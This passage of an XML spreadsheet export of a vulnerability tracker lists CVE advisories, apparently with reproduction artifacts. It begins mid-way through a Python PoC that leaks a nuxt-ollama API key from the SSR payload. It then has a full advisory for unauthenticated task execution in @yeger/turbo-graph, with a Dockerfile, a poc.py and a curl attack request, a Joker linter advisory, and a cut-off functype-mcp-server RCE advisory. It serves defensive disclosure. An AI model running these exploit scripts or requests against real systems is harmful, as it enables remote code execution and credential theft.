Nuxt's SSR pipeline serialises runtimeConfig.public for client-side hydration and
embeds it in the HTML response inside a &lt;script&gt; payload block (__NUXT__ /
__NUXT_DATA__).  Any unauthenticated HTTP GET request to the home page therefore
returns the api_key in plain text, with no authentication required.
This script:
  1. Builds a Docker image from the nuxt-ollama source with a sentinel api_key.
  2. Starts the image as a local container.
  3. Fetches http://127.0.0.1:3000/ and searches for the sentinel key.
  4. Prints an evidence excerpt and writes phase2_result.json.
"""
import json
import os
import subprocess
import sys
import time
import urllib.request
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
TARGET_KEY      = "LEAKED_TEST_KEY_123"
IMAGE_NAME      = "nuxt-ollama-vuln-001"
CONTAINER_NAME  = "nuxt-ollama-poc-001"
HOST            = "127.0.0.1"
PORT            = 3000
URL             = f"http://{HOST}:{PORT}/"
SCRIPT_DIR  = os.path.dirname(os.path.abspath(__file__))
PARENT_DIR  = os.path.dirname(SCRIPT_DIR)       # build context (contains repo/)
DOCKERFILE  = os.path.join(SCRIPT_DIR, "Dockerfile")
RESULT_FILE = os.path.join(SCRIPT_DIR, "phase2_result.json")
BUILD_CMD = f"docker build -f {DOCKERFILE} -t {IMAGE_NAME} {PARENT_DIR}"
RUN_CMD   = (
    f"docker run -d --name {CONTAINER_NAME} "
    f"-p {PORT}:{PORT} {IMAGE_NAME}"
)
POC_CMD   = f"python3 {os.path.join(SCRIPT_DIR, 'poc.py')}"
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def run_cmd(cmd_list, check=True, capture=False):
    """Execute a command, printing it first; return CompletedProcess."""
    print(f"[cmd] {' '.join(cmd_list)}", flush=True)
    return subprocess.run(
        cmd_list,
        check=check,
        capture_output=capture,
        text=bool(capture),
    )
def cleanup_container():
    """Remove the PoC container if it already exists."""
    subprocess.run(["docker", "rm", "-f", CONTAINER_NAME], capture_output=True)
def wait_for_server(url, timeout=180, interval=5):
    """Poll url until it returns a non-5xx response or the timeout expires."""
    print(f"[*] Waiting for server at {url}  (timeout={timeout}s)", flush=True)
    deadline = time.time() + timeout
    while time.time() &lt; deadline:
        try:
            with urllib.request.urlopen(url, timeout=5) as resp:
                if resp.status &lt; 500:
                    print(f"[+] Server up — HTTP {resp.status}", flush=True)
                    return True
        except Exception:
            pass
        time.sleep(interval)
    return False
def save_result(data):
    """Write phase2_result.json and echo its path."""
    with open(RESULT_FILE, "w", encoding="utf-8") as fh:
        json.dump(data, fh, ensure_ascii=False, indent=2)
    print(f"\n[*] Result saved to {RESULT_FILE}", flush=True)
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def main():
    print("=" * 66)
    print("VULN-001 PoC — nuxt-ollama@1.2.26 API Key Leak via Nuxt SSR Payload")
    print("=" * 66, flush=True)
    cleanup_container()
    # ------------------------------------------------------------------
    # Step 1 — Build Docker image
    # ------------------------------------------------------------------
    print("\n[STEP 1] Building Docker image (may take several minutes) ...", flush=True)
    build_rc = run_cmd(
        ["docker", "build", "-f", DOCKERFILE, "-t", IMAGE_NAME, PARENT_DIR],
        check=False,
    ).returncode
    if build_rc != 0:
        save_result({
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        "Docker 이미지 빌드 실패. docker build 로그를 확인하세요.",
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      f"docker build exited with returncode={build_rc}",
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        sys.exit(1)
    print("[+] Image built successfully.", flush=True)
    # ------------------------------------------------------------------
    # Step 2 — Start the container
    # ------------------------------------------------------------------
    print("\n[STEP 2] Starting container ...", flush=True)
    run_rc = run_cmd(
        ["docker", "run", "-d",
         "--name", CONTAINER_NAME,
         "-p", f"{PORT}:{PORT}",
         IMAGE_NAME],
        check=False,
    ).returncode
    if run_rc != 0:
        save_result({
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        "Docker 컨테이너 실행 실패.",
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      f"docker run exited with returncode={run_rc}",
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        sys.exit(1)
    # ------------------------------------------------------------------
    # Step 3 — Wait for Nuxt SSR server
    # ------------------------------------------------------------------
    print("\n[STEP 3] Waiting for Nuxt SSR server ...", flush=True)
    if not wait_for_server(URL, timeout=180):
        logs = subprocess.run(
            ["docker", "logs", CONTAINER_NAME],
            capture_output=True, text=True,
        )
        log_snippet = (logs.stdout + logs.stderr)[-2000:]
        print("[!] Server did not respond within timeout. Container logs:\n", log_snippet)
        save_result({
            "passed":        False,
            "verdict":       "INCOMPLETE",
            "reason":        "Nuxt SSR 서버가 180초 이내에 응답하지 않음. 컨테이너 로그 확인 필요.",
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      log_snippet,
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        cleanup_container()
        sys.exit(1)
    # ------------------------------------------------------------------
    # Step 4 — Fetch the rendered HTML page
    # ------------------------------------------------------------------
    print(f"\n[STEP 4] GET {URL} ...", flush=True)
    try:
        with urllib.request.urlopen(URL, timeout=15) as resp:
            html = resp.read().decode("utf-8", errors="replace")
    except Exception as exc:
        save_result({
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        f"HTTP 요청 실패: {exc}",
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      str(exc),
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        cleanup_container()
        sys.exit(1)
    print(f"[+] Received {len(html)} bytes.", flush=True)
    # ------------------------------------------------------------------
    # Step 5 — Verify TARGET_KEY is present in the HTTP response body
    # ------------------------------------------------------------------
    print(f"\n[STEP 5] Searching for '{TARGET_KEY}' in response ...", flush=True)
    if TARGET_KEY in html:
        idx   = html.index(TARGET_KEY)
        start = max(0, idx - 200)
        end   = min(len(html), idx + len(TARGET_KEY) + 200)
        excerpt = html[start:end].strip()
        print(f"\n{'='*66}")
        print(f"[PASS]  VULNERABILITY CONFIRMED")
        print(f"'{TARGET_KEY}' is present in the unauthenticated HTTP response.")
        print(f"{'='*66}")
        print(f"Evidence excerpt:\n\n{excerpt}\n")
        print(f"{'='*66}")
        save_result({
            "passed":        True,
            "verdict":       "PASS",
            "reason":        (
                "nuxt-ollama@1.2.26의 src/module.ts:36에서 api_key를 "
                "runtimeConfig.public.ollama에 병합함. Nuxt SSR이 해당 값을 HTML 응답의 "
                "__NUXT__ 페이로드에 직렬화하여, 인증 없는 HTTP GET 요청만으로 "
                "LEAKED_TEST_KEY_123이 응답 본문에서 노출됨이 실제 실행으로 확인됨."
            ),
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      excerpt,
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        cleanup_container()
        sys.exit(0)
    else:
        snippet = html[:3000]
        print(f"[FAIL]  '{TARGET_KEY}' NOT found in the HTTP response body.")
        print("--- HTML (first 3000 chars) ---")
        print(snippet)
        save_result({
            "passed":        False,
            "verdict":       "FAIL",
            "reason":        (
                f"'{TARGET_KEY}'가 HTTP 응답 본문에서 발견되지 않음. "
                "Nuxt 빌드 버전 또는 환경 차이로 인해 직렬화 형식이 다를 수 있음."
            ),
            "build_command": BUILD_CMD,
            "run_command":   RUN_CMD,
            "poc_command":   POC_CMD,
            "evidence":      snippet[:1500],
            "artifacts":     ["Dockerfile", "poc.py"],
        })
        cleanup_container()
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="S1289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59158</t>
        </is>
      </c>
    </row>
    <row r="1290">
      <c r="A1290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1290" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59160</t>
        </is>
      </c>
      <c r="D1290" s="5" t="inlineStr"/>
      <c r="E1290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1290" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1290" s="5" t="inlineStr"/>
      <c r="H1290" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1290" s="5" t="inlineStr"/>
      <c r="J1290" s="5" t="inlineStr"/>
      <c r="K1290" s="5" t="inlineStr"/>
      <c r="L1290" s="5" t="inlineStr">
        <is>
          <t>npm:@yeger/turbo-graph</t>
        </is>
      </c>
      <c r="M1290" s="5" t="inlineStr">
        <is>
          <t>2.8.12</t>
        </is>
      </c>
      <c r="N1290" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1290" s="5" t="inlineStr"/>
      <c r="P1290" s="5" t="inlineStr"/>
      <c r="Q1290" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R1290" s="5" t="inlineStr">
        <is>
          <t>## Unauthenticated Network-Exposed Turborepo Task Execution via /api/run
### Summary
`@yeger/turbo-graph` starts its embedded Next.js server without binding to the loopback interface, causing it to listen on all network interfaces (`0.0.0.0:29312` by default). The `/api/run` HTTP endpoint exposed by this server performs no authentication, authorization, CSRF protection, or task allowlist check before executing attacker-supplied Turborepo task names via `spawn()`. Any adjacent-network attacker can send an unauthenticated GET request to trigger arbitrary tasks defined in the victim's repository, resulting in code execution, file modification, destructive build side effects, or deployment of attacker-chosen targets with the privileges of the developer's OS user.
### Details
Two independent flaws combine to create a remotely exploitable unauthenticated code execution vulnerability:
**Flaw 1 — Server bound to all interfaces (not loopback)**
`packages/turbo-graph/src/index.ts:44` calls `.listen(options.port, callback)` without passing a hostname argument. Although `const hostname = 'localhost'` is declared at line 19, it is used only for constructing the console log URL and is never passed to `listen()`. Node.js therefore defaults to binding on `0.0.0.0` (all IPv4 interfaces) and `::` (all IPv6 interfaces), making the server reachable from the local network segment.
```ts
// packages/turbo-graph/src/index.ts
19    const hostname = 'localhost'  // used only for console URL, not for listen()
...
44        .listen(options.port, () =&gt; {   // hostname argument missing → 0.0.0.0 bind
45          const url = `http://${hostname}:${options.port}`
```
**Flaw 2 — Unauthenticated `/api/run` task execution endpoint**
`packages/turbo-graph-ui/app/api/run/route.ts:156–177` defines `GET()`, which reads `tasks`, `filter`, and `force` from the request query string and passes them directly to `buildResponseFromArgs`, which appends them to a Turbo CLI argument array and calls `spawn()`. There is no authentication check, no session validation, no CSRF token, and no task allowlist anywhere in this handler.
```ts
// packages/turbo-graph-ui/app/api/run/route.ts
156  export function GET(req: NextRequest) {
157    const url = new URL(req.url)
159    const tasksParam = url.searchParams.getAll('tasks')   // attacker-controlled source
171    const filter = url.searchParams.get('filter') ?? undefined
176    return buildResponseFromArgs(tasks, filter, req.signal, { force })
// buildResponseFromArgs — packages/turbo-graph-ui/app/api/run/route.ts
20    const args: string[] = ['run', ...tasks]              // tasks inserted directly
25          args.push(`--filter=${trimmed}`)
31      args.push('--force')
34    const child = spawn(turboBin, args, { cwd: dir, env: { ...process.env, CI: 'true' } })
                                                            // ^ sink: arbitrary task execution
```
Because `spawn()` is invoked with an argument array (not a shell string), traditional shell metacharacter injection does not apply. However, this does not mitigate the vulnerability: any task name defined in `turbo.json` of the victim's repository can be selected and run without restriction.
### PoC
**Environment setup (victim machine):**
```bash
mkdir /tmp/tg-poc &amp;&amp; cd /tmp/tg-poc
cat &gt; package.json &lt;&lt;'JSON'
{
  "private": true,
  "scripts": {
    "pwn": "node -e \"require('fs').writeFileSync('/tmp/turbo-graph-poc', 'owned\\n')\""
  },
  "devDependencies": {
    "@yeger/turbo-graph": "2.8.8",
    "turbo": "^2.0.0"
  }
}
JSON
cat &gt; turbo.json &lt;&lt;'JSON'
{
  "tasks": {
    "pwn": { "cache": false }
  }
}
JSON
npm install
npx turbo-graph --port 29312
```
**Verify the server is bound to all interfaces (Flaw 1):**
```bash
ss -tlnp 'sport = :29312'
# Expected: LISTEN 0 511 *:29312  (0.0.0.0, not 127.0.0.1)
```
**Attack request (from any host on the same network segment):**
```bash
# Replace &lt;victim-ip&gt; with the victim machine's LAN IP address.
curl -N "http://&lt;victim-ip&gt;:29312/api/run?tasks=pwn&amp;force=true"
```
**Expected outcome:**
- The server returns HTTP 200 with a `text/event-stream` response.
- An SSE `start` event is received with `args: ["run", "pwn", "--ui=stream", "--force"]`, confirming that the unauthenticated request was accepted.
- The file `/tmp/turbo-graph-poc` is created on the victim machine with content `owned`, proving arbitrary task execution.
**Containerized reproduction (automated):**
The enclosed `Dockerfile` and `poc.py` provide a self-contained reproduction. Build and run:
```bash
docker build -t vuln-001-poc &lt;vuln-001-dir&gt;
docker run --rm vuln-001-poc
```
The container confirmed all three evidence points during Phase 2 dynamic testing:
1. `ss -tlnp sport=:29312` → `LISTEN 0 511 *:29312` (all-interface binding confirmed)
2. `GET /api/run?tasks=pwn&amp;force=true` → HTTP 200, SSE `start` event with `args: ["run","pwn","--ui=stream","--force"]` (no token required)
3. `/tmp/poc-proof.txt` created with content `PWNED:&lt;timestamp&gt;` (arbitrary task execution confirmed)
### Impact
This is a **Missing Authentication for Critical Function (CWE-306)** vulnerability. Any unauthenticated attacker reachable on the same network segment as a developer running `turbo-graph` can execute arbitrary Turborepo tasks defined in that developer's repository.
Depending on the tasks configured in the victim's `turbo.json`, the impact includes:
- **Confidentiality (High):** Tasks that read secrets, generate build artifacts, or invoke cloud CLI commands can exfiltrate sensitive data.
- **Integrity (High):** Tasks that write files, run migrations, commit code, or invoke deployment scripts can permanently modify the victim's project or infrastructure.
- **Availability (High):** Tasks that delete data, exhaust resources, or run destructive build steps can disrupt ongoing development work.
The attack requires no credentials, no prior access, and no interaction from the victim beyond having `turbo-graph` running. The default port (`29312`) is static and predictable, making targeted network scanning straightforward. All users who run `npx turbo-graph` or install `@yeger/turbo-graph@2.8.8` in a shared or corporate network environment are affected.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# VULN-001 PoC: Unauthenticated Turborepo Task Execution (@yeger/turbo-graph@2.8.8)
#
# Layout:
#   /victim/          - simulated developer workspace that runs turbo-graph
#   /victim/pwn.js    - the task payload executed when the attacker fires /api/run
#   /poc.py           - attacker script: sends unauthenticated GET /api/run?tasks=pwn
#
# Build:
#   docker build -t vuln-001-poc &lt;vuln-001-dir&gt;
#
# Run:
#   docker run --rm vuln-001-poc
FROM node:20-slim
# System tools:
#   python3    - runs poc.py
#   iproute2   - ss(8) for socket-binding introspection (evidence collection)
RUN apt-get update &amp;&amp; \
    apt-get install -y --no-install-recommends python3 iproute2 &amp;&amp; \
    rm -rf /var/lib/apt/lists/*
# ---------------------------------------------------------------------------
# Victim workspace: a minimal Turborepo project that a developer might run
# ---------------------------------------------------------------------------
WORKDIR /victim
# package.json: defines the 'pwn' task script and package dependencies.
# @yeger/turbo-graph@2.8.8 is the vulnerable package (from DerYeger/yeger).
# turbo satisfies the peerDependency and provides node_modules/.bin/turbo.
RUN echo '{"private":true,"name":"victim-project","packageManager":"npm@10.8.2","scripts":{"pwn":"node /victim/pwn.js"},"devDependencies":{"@yeger/turbo-graph":"2.8.8","turbo":"^2.0.0","react":"^18.0.0","react-dom":"^18.0.0"}}' \
    &gt; /victim/package.json
# turbo.json: declares the 'pwn' task with caching disabled so it always runs.
RUN echo '{"tasks":{"pwn":{"cache":false}}}' \
    &gt; /victim/turbo.json
# pwn.js: task payload — writes a timestamped proof file and logs to stdout.
# When an attacker sends GET /api/run?tasks=pwn, turbo-graph runs this script.
RUN echo 'const fs = require("fs"); const ts = Date.now().toString(); fs.writeFileSync("/tmp/poc-proof.txt", "PWNED:" + ts); console.log("TASK_EXECUTED:" + ts);' \
    &gt; /victim/pwn.js
# Install packages from the declarations in package.json.
# --legacy-peer-deps avoids strict peer-dep resolution failures.
# The published @yeger/turbo-graph-ui@2.8.8 tarball ships a pre-built
# .next/ directory, so no separate 'next build' step is required.
RUN npm install --legacy-peer-deps --no-fund --no-audit 2&gt;&amp;1 | tail -5
# ---------------------------------------------------------------------------
# Attacker PoC script
# ---------------------------------------------------------------------------
COPY poc.py /poc.py
# Default: execute the PoC (start server, fire unauthenticated request, verify)
CMD ["python3", "/poc.py"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
PoC for VULN-001: Unauthenticated Network-Exposed Turborepo Task Execution
Package:  @yeger/turbo-graph@2.8.8
CWE:      CWE-306 (Missing Authentication for Critical Function)
CVSS:     8.8 High (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Two independent flaws combine into the vulnerability:
  1. packages/turbo-graph/src/index.ts:44 calls .listen(port) without a
     hostname argument, so Node.js defaults to 0.0.0.0 (all interfaces).
  2. packages/turbo-graph-ui/app/api/run/route.ts:156-177 GET() handler
     has zero authentication; attacker-supplied ?tasks= values are passed
     directly to spawn(turboBin, ['run', ...tasks], { cwd: victimDir }).
Attack scenario reproduced here:
  - Victim runs `turbo-graph` from a project with a side-effecting task.
  - Attacker sends a plain unauthenticated GET /api/run?tasks=pwn.
  - The server executes `turbo run pwn` in the victim's project directory.
  - The 'pwn' task writes /tmp/poc-proof.txt, proving arbitrary execution.
"""
import os
import socket
import subprocess
import sys
import time
import urllib.error
import urllib.request
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
PROOF_FILE = "/tmp/poc-proof.txt"
PORT = 29312
VICTIM_DIR = "/victim"
TURBO_GRAPH_BIN = os.path.join(VICTIM_DIR, "node_modules", ".bin", "turbo-graph")
SERVER_STARTUP_TIMEOUT = 120   # seconds; Next.js production startup can be slow
REQUEST_TIMEOUT = 90            # seconds to wait for the SSE stream to finish
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def wait_for_port(host: str, port: int, timeout: int) -&gt; bool:
    """Poll until the TCP port accepts connections or timeout expires."""
    deadline = time.time() + timeout
    while time.time() &lt; deadline:
        try:
            with socket.create_connection((host, port), timeout=2):
                return True
        except (ConnectionRefusedError, OSError):
            time.sleep(1)
    return False
def get_socket_binding(port: int) -&gt; str:
    """Return the raw 'ss' output for the listening socket on *port*."""
    try:
        result = subprocess.run(
            ["ss", "-tlnp", f"sport = :{port}"],
            capture_output=True,
            text=True,
            timeout=5,
        )
        return result.stdout.strip()
    except Exception as exc:
        return f"(ss unavailable: {exc})"
def binding_is_all_interfaces(ss_output: str) -&gt; bool:
    """Return True when the socket is listening on all interfaces."""
    return any(
        marker in ss_output
        for marker in ("0.0.0.0", "*:", "[::]", ":::")
    )
def read_sse_stream(url: str, timeout: int) -&gt; list:
    """
    Open *url* as a Server-Sent Events stream and return parsed events.
    Each event is a dict with keys 'type' and optionally 'data'.
    Stops when an 'end' event is received or *timeout* seconds elapse.
    """
    events = []
    try:
        req = urllib.request.Request(
            url,
            headers={
                "Accept": "text/event-stream",
                "Cache-Control": "no-cache",
                "Connection": "keep-alive",
            },
        )
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            print(f"  [HTTP] {resp.status} {resp.reason}")
            print(f"  [HTTP] Content-Type: {resp.getheader('Content-Type', '')}")
            buf = ""
            deadline = time.time() + timeout
            while time.time() &lt; deadline:
                chunk = resp.read(4096)
                if not chunk:
                    break
                buf += chunk.decode("utf-8", errors="replace")
                # Parse complete SSE blocks (separated by blank lines)
                while "\n\n" in buf:
                    block, buf = buf.split("\n\n", 1)
                    ev: dict = {}
                    for line in block.strip().split("\n"):
                        if line.startswith("event: "):
                            ev["type"] = line[7:]
                        elif line.startswith("data: "):
                            ev["data"] = line[6:]
                        # ignore SSE comments (':') and 'retry:' lines
                    if ev.get("type"):
                        events.append(ev)
                        preview = ev.get("data", "")[:120]
                        print(f"  [SSE]  event={ev['type']}  data={preview}")
                        if ev["type"] == "end":
                            return events
    except urllib.error.HTTPError as exc:
        print(f"  [!] HTTP error: {exc.code} {exc.reason}")
    except Exception as exc:
        print(f"  [!] Stream error: {type(exc).__name__}: {exc}")
    return events
# ---------------------------------------------------------------------------
# Main PoC
# ---------------------------------------------------------------------------
def main() -&gt; int:
    sep = "=" * 64
    print(sep)
    print("VULN-001 PoC  —  Unauthenticated Turborepo Task Execution")
    print("Package : @yeger/turbo-graph@2.8.8")
    print("CWE-306 : Missing Authentication for Critical Function")
    print(sep)
    print()
    # Remove stale proof file from a previous run
    if os.path.exists(PROOF_FILE):
        os.remove(PROOF_FILE)
    # ------------------------------------------------------------------
    # Step 1: Start turbo-graph server from the victim project directory
    # The CLI does NOT pass a hostname to .listen(), so Node.js binds to
    # 0.0.0.0 (all interfaces) — see index.ts:44.
    # ------------------------------------------------------------------
    print(f"[1] Starting turbo-graph from {VICTIM_DIR} on port {PORT} ...")
    server = subprocess.Popen(
        [TURBO_GRAPH_BIN, "--port", str(PORT)],
        cwd=VICTIM_DIR,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        text=True,
    )
    # ------------------------------------------------------------------
    # Step 2: Wait for the port to become available
    # ------------------------------------------------------------------
    print(f"[2] Waiting up to {SERVER_STARTUP_TIMEOUT}s for Next.js server startup ...")
    ready = wait_for_port("127.0.0.1", PORT, timeout=SERVER_STARTUP_TIMEOUT)
    if not ready:
        server.kill()
        stdout, _ = server.communicate()
        print(f"[!] Server did not become ready within {SERVER_STARTUP_TIMEOUT}s.")
        print(f"    stdout/stderr:\n{stdout[:2000]}")
        return 1
    print(f"[+] Server is accepting connections on port {PORT}.")
    # ------------------------------------------------------------------
    # Step 3: Verify that the socket is bound to 0.0.0.0 (all interfaces)
    # Flaw 1: .listen(port) without hostname → network-exposed.
    # ------------------------------------------------------------------
    ss_output = get_socket_binding(PORT)
    print(f"\n[3] Socket binding (ss -tlnp sport=:{PORT}):")
    print(f"    {ss_output}")
    if binding_is_all_interfaces(ss_output):
        print(f"[+] FLAW-1 CONFIRMED: Server bound to all interfaces (0.0.0.0 / ::), not loopback only.")
    else:
        print(f"[?] Could not confirm all-interface binding; proceeding with request test.")
    # ------------------------------------------------------------------
    # Step 4: Send an unauthenticated GET /api/run?tasks=pwn request
    # Flaw 2: no authentication, authorisation, CSRF check, or task
    #         allowlist — see route.ts:156-177.
    # ------------------------------------------------------------------
    url = f"http://127.0.0.1:{PORT}/api/run?tasks=pwn&amp;force=true"
    print(f"\n[4] Sending unauthenticated HTTP request (no token, no credentials):")
    print(f"    GET {url}")
    sse_events = read_sse_stream(url, timeout=REQUEST_TIMEOUT)
    # Allow a moment for any buffered I/O in the child process to flush
    time.sleep(3)
    # ------------------------------------------------------------------
    # Step 5: Evaluate exploitation results
    # ------------------------------------------------------------------
    exploited = os.path.exists(PROOF_FILE)
    proof_content = open(PROOF_FILE).read().strip() if exploited else ""
    start_event = next((e for e in sse_events if e.get("type") == "start"), None)
    end_event   = next((e for e in sse_events if e.get("type") == "end"),   None)
    log_events  = [e for e in sse_events if e.get("type") in ("log", "stderr")]
    print()
    print(sep)
    print("EVIDENCE SUMMARY")
    print(sep)
    # Evidence A: socket binding
    if binding_is_all_interfaces(ss_output):
        print(f"[A] FLAW-1  — Socket bound to all interfaces: {ss_output.split(chr(10))[0][:80]}")
    else:
        print(f"[A] FLAW-1  — ss output: {ss_output[:80]}")
    # Evidence B: unauthenticated SSE response
    if start_event:
        print(f"[B] FLAW-2  — Unauthenticated /api/run accepted; SSE start args:")
        print(f"              {start_event.get('data', '')}")
    else:
        received = [e.get("type") for e in sse_events]
        print(f"[B] FLAW-2  — SSE events received: {received}")
    # Evidence C: turbo task exit code
    if end_event:
        print(f"[C] TURBO   — turbo run exit code: {end_event.get('data', '')}")
    # Evidence D: proof file (arbitrary code execution)
    if exploited:
        print(f"[D] EXPLOIT — Proof file created: {PROOF_FILE}")
        print(f"              Content: {proof_content}")
    else:
        print(f"[D] EXPLOIT — Proof file NOT created: {PROOF_FILE}")
        if log_events:
            print(f"    Task stdout/stderr (first 5 lines):")
            for ev in log_events[:5]:
                print(f"      [{ev['type']}] {ev.get('data', '')}")
    print(sep)
    # Clean up
    server.kill()
    server.wait(timeout=10)
    if exploited:
        print("\n[RESULT] PASS — Exploitation reproduced. Proof file written by unauthenticated request.")
        return 0
    else:
        print("\n[RESULT] FAIL — Proof file not created. See evidence above for diagnostics.")
        return 1
if __name__ == "__main__":
    sys.exit(main())
```</t>
        </is>
      </c>
      <c r="S1290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59160</t>
        </is>
      </c>
    </row>
    <row r="1291">
      <c r="A1291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1291" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59172</t>
        </is>
      </c>
      <c r="D1291" s="5" t="inlineStr"/>
      <c r="E1291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1291" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1291" s="5" t="inlineStr"/>
      <c r="H1291" s="5" t="inlineStr"/>
      <c r="I1291" s="5" t="inlineStr"/>
      <c r="J1291" s="5" t="inlineStr"/>
      <c r="K1291" s="5" t="inlineStr"/>
      <c r="L1291" s="5" t="inlineStr">
        <is>
          <t>go:github.com/candid82/joker</t>
        </is>
      </c>
      <c r="M1291" s="5" t="inlineStr">
        <is>
          <t>1.8.2</t>
        </is>
      </c>
      <c r="N1291" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1291" s="5" t="inlineStr"/>
      <c r="P1291" s="5" t="inlineStr"/>
      <c r="Q1291" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="R1291" s="5" t="inlineStr">
        <is>
          <t>## Impact
In Joker versions before 1.8.2, `joker --lint &lt;file&gt;` located a `.jokerd/` directory by walking up from the linted file and executed matching `linter.*` files from that directory before linting. Because these files are executable Joker/Clojure code, linting a file inside an untrusted repository could execute code supplied by that repository.
This could be triggered by editor integrations or CI jobs that automatically run `joker --lint` on checked-out source code.
## Patches
Fixed in Joker v1.8.2. Executable linter customization files are now loaded only from the user's home `.jokerd` directory (`~/.jokerd/linter.cljc`, `~/.jokerd/linter.clj`, `~/.jokerd/linter.cljs`, or `~/.jokerd/linter.joke`). Project-local `.jokerd/linter.*` files are no longer executed.
## Workarounds
Users who cannot upgrade should avoid running `joker --lint` on untrusted repositories, especially through editor integrations or unattended CI. Removing or disabling project-local `.jokerd/linter.*` files before linting also avoids the code-execution path.
## Credits
Reported by Younghun Ko of AhnLab (@koyokr).</t>
        </is>
      </c>
      <c r="S1291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59172</t>
        </is>
      </c>
    </row>
    <row r="1292">
      <c r="A1292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1292" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59176</t>
        </is>
      </c>
      <c r="D1292" s="5" t="inlineStr"/>
      <c r="E1292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1292" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1292" s="5" t="inlineStr"/>
      <c r="H1292" s="5" t="inlineStr"/>
      <c r="I1292" s="5" t="inlineStr"/>
      <c r="J1292" s="5" t="inlineStr"/>
      <c r="K1292" s="5" t="inlineStr"/>
      <c r="L1292" s="5" t="inlineStr">
        <is>
          <t>npm:functype-mcp-server</t>
        </is>
      </c>
      <c r="M1292" s="5" t="inlineStr">
        <is>
          <t>1.4.4</t>
        </is>
      </c>
      <c r="N1292" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1292" s="5" t="inlineStr"/>
      <c r="P1292" s="5" t="inlineStr"/>
      <c r="Q1292" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="R1292" s="5" t="inlineStr">
        <is>
          <t>## MCP `set_functype_version` Package Alias RCE via Unsanitized pnpm install + Dynamic Import
### Summary
The `set_functype_version` MCP tool in `functype-mcp-server` accepts an unconstrained `version` string, interpolates it directly into an npm package specifier (`functype@&lt;version&gt;`), and installs it via `pnpm add` without any validation. Because npm/pnpm package specifiers support `file:`, `npm:`, and other alias syntaxes, an attacker who can send an MCP `tools/call` request to this tool can cause the server to install an arbitrary local or remote package as `functype`. Immediately after installation, the server calls `initDocsData(true)`, which dynamically imports `functype/cli` from the newly installed location, executing attacker-controlled JavaScript in the MCP server process. This results in full Remote Code Execution (RCE) with the privileges of the server process — full confidentiality, integrity, and availability impact (CVSS 7.8 High).
### Details
The vulnerable code is in `packages/mcp-server/src/index.ts`. The `set_functype_version` tool is registered at line 115 and is enabled by default (no authentication required in stdio mode).
**Source (user input accepted without validation):**
```ts
// packages/mcp-server/src/index.ts:119-121
parameters: z.object({
  version: z.string().describe('The functype version to install (e.g., "0.46.0", "latest", "^0.45.0")'),
}),
```
Only `z.string()` validation is applied — no semver format check, no allowlist for dist-tags, and no rejection of `file:`, `npm:`, URL, or path alias syntaxes.
**Sink 1 — arbitrary package installation:**
```ts
// packages/mcp-server/src/index.ts:122-125
execute: async (args) =&gt; {
